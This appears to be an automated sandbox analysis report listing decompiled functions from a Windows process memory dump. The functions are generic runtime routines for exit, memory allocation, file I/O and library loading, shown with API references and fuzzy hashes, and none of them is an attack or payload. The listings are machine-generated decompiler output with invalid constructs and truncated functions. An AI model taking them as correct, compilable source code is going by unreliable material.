Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID:
API String ID: 3490077880-0
Opcode ID: bf4da6e25b82f27659905996c7380b79b83ab0ced5a03e697dd3e7aa7360de26
Instruction ID: ae86e3c572180b17c01ff7deee3723e6db1901e31400f3d11ea795e357d1f3a4
Opcode Fuzzy Hash: bf4da6e25b82f27659905996c7380b79b83ab0ced5a03e697dd3e7aa7360de26
Instruction Fuzzy Hash: 90317EB06007408BDB31BBA995483577BE06B9A309F04493FE745A72D2E7BDE890CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040457C, Relevance: 4.6, APIs: 3, Instructions: 85
threadCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040457C() {
				void* _t16;
				int _t23;
				void* _t35;
				void* _t50;
				struct HINSTANCE__* _t58;
				void* _t64;

				if( *0x412004 != 0) {
					E00404458();
					E004044F0(_t50);
					 *0x412004 = 0;
				}
				if( *0x415b18 != 0 && GetCurrentThreadId() ==  *0x415b40) {
					E004041DC(0x415b14);
					E004044C4(0x415b14);
				}
				if( *0x00415B0C != 0 ||  *0x413048 == 0) {
					L9:
					if( *((char*)(0x415b0c)) == 2 &&  *0x412000 == 0) {
						 *0x00415AF0 = 0;
					}
					_t16 = E00402EC8();
					_t48 = _t16;
					if(_t16 == 0) {
						L14:
						E00404204(); // executed
						if( *((char*)(0x415b0c)) <= 1 ||  *0x412000 != 0) {
							_t63 =  *0x00415AF4;
							if( *0x00415AF4 != 0) {
								E00406204(_t63);
								_t7 =  *((intOrPtr*)(0x415af4)) + 0x10; // 0x400000
								_t58 =  *_t7;
								_t9 =  *((intOrPtr*)(0x415af4)) + 4; // 0x400000
								if(_t58 !=  *_t9 && _t58 != 0) {
									FreeLibrary(_t58);
								}
							}
						}
						E004041DC(0x415ae4);
						if( *((char*)(0x415b0c)) == 1) {
							 *0x00415B08();
						}
						if( *((char*)(0x415b0c)) != 0) {
							E004044C4(0x415ae4);
						}
						if( *0x415ae4 == 0) {
							if( *0x41302c != 0) {
								 *0x41302c();
							}
							_t23 =  *0x412000; // 0x0
							ExitProcess(_t23); // executed
						}
						memcpy(0x415ae4,  *0x415ae4, 0xc << 2);
						_t64 = _t64 + 0xc;
						0x415ae4 = 0x415ae4;
						goto L9;
					} else {
						do {
							E00403894(_t48);
							_t35 = E00402EC8();
							_t48 = _t35;
						} while (_t35 != 0);
						goto L14;
					}
				} else {
					do {
						 *0x413048 = 0;
						 *((intOrPtr*)( *0x413048))();
					} while ( *0x413048 != 0);
					L9:
					while(1) {
					}
				}
			}

APIs

GetCurrentThreadId.KERNEL32 ref: 004045B1
FreeLibrary.KERNEL32(00400000,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000,?,?,?,00000000,0040B7F4,00000000,0040B83D), ref: 00404652
ExitProcess.KERNEL32(00000000,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000,?,?,?,00000000,0040B7F4,00000000,0040B83D), ref: 0040468E

Part of subcall function 004044F0: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000,?), ref: 00404529
Part of subcall function 004044F0: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000), ref: 0040452F
Part of subcall function 004044F0: GetStdHandle.KERNEL32(000000F5,0040457C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?), ref: 00404544
Part of subcall function 004044F0: WriteFile.KERNEL32(00000000,000000F5,0040457C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?), ref: 0040454A

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID:
API String ID: 3490077880-0
Opcode ID: ef303358ffc1e6e0198b2a0a684d254f0c5984d34b54cf5c49c6103e49519b38
Instruction ID: 381d49ba10d3c5657357f4fb8878975e958cf176e4fcae55fd6a7565d347896d
Opcode Fuzzy Hash: ef303358ffc1e6e0198b2a0a684d254f0c5984d34b54cf5c49c6103e49519b38
Instruction Fuzzy Hash: 0A31A1B06007408BDB31BBB995483577AE06B99309F04493FE745A72D2E7BDE890CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00402D08, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402D08() {
				intOrPtr _t13;
				int _t14;
				void* _t16;
				int _t20;
				void* _t21;
				void* _t22;
				void* _t23;

				_t23 =  *0x00413A28;
				while(_t23 != 0x413a24) {
					VirtualFree(_t23, 0, 0x8000); // executed
					_t23 =  *(_t23 + 4);
				}
				_t21 = 0x37;
				_t13 = 0x41205c;
				do {
					 *((intOrPtr*)(_t13 + 0x14)) = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t13;
					 *((intOrPtr*)(_t13 + 8)) = 1;
					 *((intOrPtr*)(_t13 + 0xc)) = 0;
					_t13 = _t13 + 0x20;
					_t21 = _t21 - 1;
				} while (_t21 != 0);
				 *0x413a24 = 0x413a24;
				 *0x00413A28 = 0x413a24;
				_t22 = 0x400;
				_t20 = 0x413ac4;
				do {
					_t14 = _t20;
					 *_t14 = _t14;
					_t8 = _t14 + 4; // 0x413ac4
					 *_t8 = _t14;
					_t20 = _t20 + 8;
					_t22 = _t22 - 1;
				} while (_t22 != 0);
				_t16 =  *0x00415ACC;
				while(_t16 != 0x415ac8) {
					_t10 = _t16 + 4; // 0x415ac8
					_t14 = VirtualFree(_t16, 0, 0x8000);
					_t16 =  *_t10;
				}
				 *0x415ac8 = 0x415ac8;
				 *0x00415ACC = 0x415ac8;
				return _t14;
			}

0x00402d16
0x00402d2d
0x00402d26
0x00402d2b
0x00402d2b
0x00402d31
0x00402d36
0x00402d3b
0x00402d3d
0x00402d42
0x00402d45
0x00402d4e
0x00402d51
0x00402d54
0x00402d54
0x00402d57
0x00402d59
0x00402d5c
0x00402d61
0x00402d66
0x00402d66
0x00402d68
0x00402d6a
0x00402d6a
0x00402d6d
0x00402d70
0x00402d70
0x00402d73
0x00402d8a
0x00402d78
0x00402d83
0x00402d88
0x00402d88
0x00402d8e
0x00402d90
0x00402d97

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00402DE8,004064E4,00000000,00406506), ref: 00402D26
VirtualFree.KERNEL32(00415AC8,00000000,00008000,?,00000000,00008000,?,?,?,?,00402DE8,004064E4,00000000,00406506), ref: 00402D83

Strings

$:A, xrefs: 00402D0C

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeVirtual
String ID: $:A
API String ID: 1263568516-3833043025
Opcode ID: 2d2d782df9233161c06dec7e4b6ee0fe064feae8b47c0467e0eab097918889d1
Instruction ID: d24d952728fcc3a9646f3ebb449162ef2ce13bf0a669e40d3a5f1eeb3db0775a
Opcode Fuzzy Hash: 2d2d782df9233161c06dec7e4b6ee0fe064feae8b47c0467e0eab097918889d1
Instruction Fuzzy Hash: F01161B13006009BD7248F089A84B66BAA5EF89754F25C07FE209AF3C1D678EC42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004015E4, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 38
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015E4(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void* _t10;
				void** _t15;
				void* _t17;

				_t8 = __eax;
				E00401578(__eax);
				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x413a3c = 0;
					return 0;
				} else {
					_t15 =  *0x413a28; // 0x413a24
					_t10 = _t4;
					 *_t10 = 0x413a24;
					 *0x413a28 = _t4;
					 *(_t10 + 4) = _t15;
					 *_t15 = _t4;
					_t17 = _t4 + 0x13fff0;
					 *((intOrPtr*)(_t17 - 4)) = 2;
					 *0x413a3c = 0x13ffe0 - _t8;
					_t7 = _t17 - _t8;
					 *0x413a38 = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}

0x004015e5
0x004015e7
0x004015fa
0x00401601
0x00401652
0x0040165a
0x00401603
0x00401603
0x00401609
0x0040160b
0x00401611
0x00401616
0x00401619
0x0040161d
0x00401628
0x00401635
0x0040163d
0x0040163f
0x0040164c
0x0040164f
0x0040164f

APIs

VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00401BF3,?,004018C6), ref: 004015FA

Strings

$:A, xrefs: 0040160B
$:A, xrefs: 00401603, 00401611

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: $:A$$:A
API String ID: 4275171209-1384836841
Opcode ID: 39421edb908c6995d62f2c0b4cea7b3dead7872c1aad425fc2c1c6bc86b03942
Instruction ID: cf32fbc5601a1205f328c6ffb622e927ebfe32a850b6ecb500ba2c71dea074df
Opcode Fuzzy Hash: 39421edb908c6995d62f2c0b4cea7b3dead7872c1aad425fc2c1c6bc86b03942
Instruction Fuzzy Hash: 49F06DF1B103405FDB04DF7A9E817427BD6AB89396F20C03EE549EB7A8E77585418B08

Uniqueness

Uniqueness Score: -1.00%

Function 004119ED, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119
windowCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004119ED(signed int __ebx, void* __edi, void* __esi, void* __fp0) {
				signed char _t70;
				intOrPtr _t82;
				void* _t96;
				void* _t98;

				_t96 = __edi;
				_pop(_t82);
				_pop(_t73);
				 *[fs:eax] = _t82;
				E0040EAA0(_t73);
				_t70 = __ebx >> 1;
				_push(__esi);
				 *((intOrPtr*)(_t98 + 0x50)) =  *((intOrPtr*)(_t98 + 0x50)) + __esi;
			}

0x004119ed
0x004119ef
0x004119f1
0x004119f2
0x00411a12
0x00411a14
0x00411a16
0x00411a1d

APIs

MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 00411A57

Strings

.tmp, xrefs: 00411A9D

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Message
String ID: .tmp
API String ID: 2030045667-2986845003
Opcode ID: aa335ddb19998c274477acd24add62c4eb0e4fb4cacc36a52dd716c2d59fe4ed
Instruction ID: 4f38a7cb95b2049e0ccd3ff5d2cc9ece443d10271b968dbd08f30af9efcfd22f
Opcode Fuzzy Hash: aa335ddb19998c274477acd24add62c4eb0e4fb4cacc36a52dd716c2d59fe4ed
Instruction Fuzzy Hash: 0E419D747002409FD700EF65ED92E9A77A5EB49308B21857EF900A77B1DB39AC41CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00411A14, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
windowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00411A14(void* __eax, signed int __ebx, void* __edi, void* __esi, void* __fp0) {
				signed char _t69;
				void* _t94;
				void* _t96;

				_t94 = __edi;
				_t69 = __ebx >> 1;
				_push(__esi);
				 *((intOrPtr*)(_t96 + 0x50)) =  *((intOrPtr*)(_t96 + 0x50)) + __esi;
			}

0x00411a14
0x00411a14
0x00411a16
0x00411a1d

APIs

MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 00411A57

Strings

.tmp, xrefs: 00411A9D

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Message
String ID: .tmp
API String ID: 2030045667-2986845003
Opcode ID: 37fb123fd76f62bcb6a1511a136821f2e0fbe3da14741a40b1c705a0ba5e0d56
Instruction ID: 047628a6cad94539b1516682b219623fe898eb5eae23af65b704a5dfc85e6a4c
Opcode Fuzzy Hash: 37fb123fd76f62bcb6a1511a136821f2e0fbe3da14741a40b1c705a0ba5e0d56
Instruction Fuzzy Hash: 80417B746002409FD741EF65ED92EDA77B5EB49308B11857EF900A77A1CB39AC41CBAC

Uniqueness

Uniqueness Score: -1.00%

Function 0040E168, Relevance: 3.0, APIs: 2, Instructions: 42
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040E168(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E0040E11C(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x40e1c5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = DeleteFileW(E00404D24(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E0040E1CC);
					return E0040E158( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}

0x0040e169
0x0040e16b
0x0040e180
0x0040e18b
0x0040e18c
0x0040e191
0x0040e194
0x0040e19f
0x0040e1a4
0x0040e1ac
0x0040e1b1
0x0040e1b4
0x0040e1b7
0x0040e1c4
0x0040e182
0x0040e184
0x0040e1dd
0x0040e1dd

APIs

DeleteFileW.KERNEL32(00000000,00000000,0040E1C5,?,0000000D,00000000), ref: 0040E19F
GetLastError.KERNEL32(00000000,00000000,0040E1C5,?,0000000D,00000000), ref: 0040E1A7

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: a2e5160283b2e7e3ee29734541207e3f7ac44b2fb4d0f38be6bcdfeece2073ee
Instruction ID: 9ee51f34468692f2fa01031a72dd6d75f86ce427ddf2a471b47f6d80da344237
Opcode Fuzzy Hash: a2e5160283b2e7e3ee29734541207e3f7ac44b2fb4d0f38be6bcdfeece2073ee
Instruction Fuzzy Hash: 60F0F631A14308AFDB00EFB7AC0249EB3E8DB497147514DBBF804F7781E6395E208598

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC82, Relevance: 3.0, APIs: 2, Instructions: 34
libraryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040AC82(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x40acf6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x40acd8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryW(E00404D24(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(E0040ACDF);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}

0x0040ac85
0x0040ac87
0x0040ac8b
0x0040ac8e
0x0040ac93
0x0040ac98
0x0040ac99
0x0040ac9e
0x0040aca1
0x0040aca4
0x0040aca9
0x0040acaa
0x0040acaf
0x0040acb2
0x0040acbd
0x0040acc2
0x0040acc7
0x0040acca
0x0040accd
0x0040acd2
0x0040acd4
0x0040acd7

APIs

SetErrorMode.KERNEL32 ref: 0040AC8E
LoadLibraryW.KERNEL32(00000000,00000000,0040ACD8,?,00000000,0040ACF6), ref: 0040ACBD

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 4a0d345e161d9aa04fb204192aef2064e70d77f987adaa7dd9b6adf39232b4dc
Instruction ID: 446626037349bff6c3d3fc7edf50d58ff88a58da299c323ca587a544ae1629d3
Opcode Fuzzy Hash: 4a0d345e161d9aa04fb204192aef2064e70d77f987adaa7dd9b6adf39232b4dc
Instruction Fuzzy Hash: 3AF08970A047447FEB115F768C5242AB6ECE74DB047538876FD01E29D1E53D4C20D569

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC84, Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040AC84(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x40acf6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x40acd8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryW(E00404D24(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(E0040ACDF);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}

APIs

SetErrorMode.KERNEL32 ref: 0040AC8E
LoadLibraryW.KERNEL32(00000000,00000000,0040ACD8,?,00000000,0040ACF6), ref: 0040ACBD

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: d906d2629e9325c76dbb444b949735e4ca7d417c166a0045cd3f60122fff6cd7
Instruction ID: 93d40f3431e9079428ff9cf159756719ddb02882c84a7d17cb6b63846cc3cebc
Opcode Fuzzy Hash: d906d2629e9325c76dbb444b949735e4ca7d417c166a0045cd3f60122fff6cd7
Instruction Fuzzy Hash: 7CF089709047447FDB115F768C5241AB6ECE74DB047538876F901A29D1E53D4820D569

Uniqueness

Uniqueness Score: -1.00%

Function 00411E2B, Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411E2B(void* __edx) {
				intOrPtr _t1;
				int _t2;
				intOrPtr _t3;
				intOrPtr _t5;
				struct HWND__* _t8;
				intOrPtr _t9;
				intOrPtr _t12;
				intOrPtr _t15;
				intOrPtr _t16;

				_t1 =  *0x41865c; // 0x0
				_t2 = E00403894(_t1);
				if( *0x418670 != 0) {
					_t16 =  *0x418670; // 0x0
					_t2 = E0040E5DC(0, _t16, 0xfa, 0x32); // executed
				}
				if( *0x418668 != 0) {
					_t9 =  *0x418668; // 0x0
					_t2 = RemoveDirectoryW(E00404D24(_t9)); // executed
				}
				if( *0x412af0 != 0) {
					_t8 =  *0x412af0; // 0xc025e
					_t2 = DestroyWindow(_t8); // executed
				}
				if( *0x41864c != 0) {
					_t3 =  *0x41864c; // 0x0
					_t12 =  *0x418650; // 0x10
					_t15 =  *0x40dcc4; // 0x40dcc8
					E00405548(_t3, _t12, _t15);
					_t5 =  *0x41864c; // 0x0
					E00402E20(_t5);
					 *0x41864c = 0;
					return 0;
				}
				return _t2;
			}

0x00411d9c
0x00411da1
0x00411dad
0x00411dbb
0x00411dc3
0x00411dc3
0x00411dcf
0x00411dd1
0x00411ddc
0x00411ddc
0x00411de8
0x00411dea
0x00411df0
0x00411df0
0x00411dfc
0x00411dfe
0x00411e03
0x00411e09
0x00411e0f
0x00411e14
0x00411e19
0x00411e20
0x00000000
0x00411e20
0x00411e25

APIs

RemoveDirectoryW.KERNEL32(00000000,00411E30,?,?,?,?,?,?,?,?,?,?,000C025E,000000FC,0040EAC4,00000000), ref: 00411DDC
DestroyWindow.USER32(000C025E,00411E30,?,?,?,?,?,?,?,?,?,?,000C025E,000000FC,0040EAC4,00000000), ref: 00411DF0

Part of subcall function 0040E5DC: Sleep.KERNEL32(?,?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E5FB
Part of subcall function 0040E5DC: GetLastError.KERNEL32(?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E61E
Part of subcall function 0040E5DC: GetLastError.KERNEL32(?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E628

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$DestroyDirectoryRemoveSleepWindow
String ID:
API String ID: 2192421792-0
Opcode ID: 1c6e906a6b538894d20e67497be97229656c28b0a5b638914f3d493938282075
Instruction ID: a35aad7cbc91a908b341ba8d3f0a599e5b1b0848bb1b06d1b2f77e860150aa5c
Opcode Fuzzy Hash: 1c6e906a6b538894d20e67497be97229656c28b0a5b638914f3d493938282075
Instruction Fuzzy Hash: 7501B6B02411009BD725EB69ED49BD933E1AB04309F14C93EA501972F5CE78A885CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3D0, Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040C3D0(intOrPtr* __eax, void* __edx) {
				long _v16;
				long _v20;
				long _t8;
				intOrPtr* _t10;

				asm("movsd");
				asm("movsd");
				_t10 = __eax;
				_t8 = SetFilePointer( *(__eax + 4), _v20,  &_v16, 0); // executed
				if(_t8 == 0xffffffff) {
					_t8 = GetLastError();
					if(_t8 != 0) {
						_t8 = E0040C1E4( *_t10);
					}
				}
				return _t8;
			}

0x0040c3db
0x0040c3dc
0x0040c3dd
0x0040c3ef
0x0040c3f7
0x0040c3f9
0x0040c400
0x0040c404
0x0040c404
0x0040c400
0x0040c40e

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040C3EF
GetLastError.KERNEL32(?,?,?,00000000), ref: 0040C3F9

Part of subcall function 0040C1E4: GetLastError.KERNEL32(0040C0A4,0040C287,?,?,00000000,?,0041187B,00000001,00000000,00000002,00000000,00411E7A,?,00000000,00411EBE), ref: 0040C1E7

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 50424b7e63cd685a17b9bd9a31ccaacf5ff4b9d99749838fd5b7a0ea15fdad11
Instruction ID: f9611c5e409b5906aabc26baa8b2dfa3f65e665b165aedc4df9fb55df43993f0
Opcode Fuzzy Hash: 50424b7e63cd685a17b9bd9a31ccaacf5ff4b9d99749838fd5b7a0ea15fdad11
Instruction Fuzzy Hash: 51E092762041009BD610E6ADD8C1AAB77DC9F85374F244737F664EB1D2D675D8008775

Uniqueness

Uniqueness Score: -1.00%

Function 0040C390, Relevance: 3.0, APIs: 2, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040C390(intOrPtr* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t7;
				intOrPtr* _t12;

				_push(__ecx);
				_t12 = __eax;
				_t7 = ReadFile( *(__eax + 4), __edx, __ecx,  &_v16, 0); // executed
				if(_t7 == 0 && ( *((char*)(_t12 + 8)) != 0 || GetLastError() != 0x6d)) {
					E0040C1E4( *_t12);
				}
				return _v16;
			}

0x0040c393
0x0040c398
0x0040c3a7
0x0040c3ae
0x0040c3c2
0x0040c3c2
0x0040c3ce

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040C3A7
GetLastError.KERNEL32(?,?,?,?,00000000), ref: 0040C3B6

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 30cf0fc7fcda4529806b73604fb8d9908d86cd92c6d9eb36858da68b1bf07751
Instruction ID: e0f4121c1e9b4399ab2b1c9bf066f68ed76d1cae12be267a3e8b7d415970813a
Opcode Fuzzy Hash: 30cf0fc7fcda4529806b73604fb8d9908d86cd92c6d9eb36858da68b1bf07751
Instruction Fuzzy Hash: 78E09B72214150EADB10E75A9CC4F5B57DCCB86314F04817BF904DB281C674CC10C775

Uniqueness

Uniqueness Score: -1.00%

Function 0040C328, Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C328(intOrPtr* __eax, long* __edx) {
				long _t8;
				long* _t11;
				intOrPtr* _t13;

				_t11 = __edx;
				_t13 = __eax;
				 *(__edx + 4) = 0;
				_t8 = SetFilePointer( *(__eax + 4), 0, __edx + 4, 1); // executed
